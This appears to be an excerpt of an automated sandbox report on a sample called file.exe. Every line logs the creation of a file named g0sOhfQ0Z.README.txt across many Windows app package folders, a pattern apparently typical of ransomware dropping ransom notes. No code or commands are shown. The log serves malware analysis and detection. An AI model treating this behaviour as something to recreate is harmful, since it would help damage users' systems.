            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
